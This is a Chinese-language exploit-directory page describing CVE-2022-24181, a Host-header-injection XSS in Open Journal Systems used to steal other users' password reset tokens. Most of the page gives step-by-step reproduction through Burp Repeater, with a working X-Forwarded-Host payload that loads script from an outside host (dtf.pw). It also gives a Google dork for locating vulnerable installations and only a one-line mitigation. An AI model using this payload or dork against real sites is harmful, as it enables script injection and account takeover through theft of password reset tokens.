Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2022-24181 — 通过Host Header注入进行XSS并窃取其他用户的密码重置令牌 | Kitploit
工具/GitHubGitHub/cyberhawk000/cve-2022-24181
侦察漏洞分析Web应用程序漏洞利用信息收集渗透测试
GitHubcyberhawk000/cve-2022-24181

CVE-2022-24181

通过Host Header注入进行XSS并窃取其他用户的密码重置令牌

查看仓库
1171年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2022-24181 和 CVE-2022-26616。两者可能相同

Open-journal-system-漏洞

通过主机头注入的XSS及窃取其他用户的密码重置令牌 复现步骤:

  1. 访问此网站:https://who's-using-ojs-software.com
  2. 在Burp中捕获此请求,并发送到Repeater。
  3. 在Host Header之后添加此内容:X-Forwarded-Host: foo"><script src=//dtf.pw/2.js><x=".com
  4. 然后点击发送,之后右键点击请求并选择在浏览器中显示响应,然后复制该请求。
  5. 在浏览器中粘贴此请求,你会看到XSS弹窗。 缓解措施:更新到较新版本。

查找此漏洞的Google Dork intitle:ojs PKP供应商的Open-journal-system软件版本2.4.8至3.3.8均存在通过主机头注入的XSS漏洞及窃取密码重置令牌漏洞

下载工具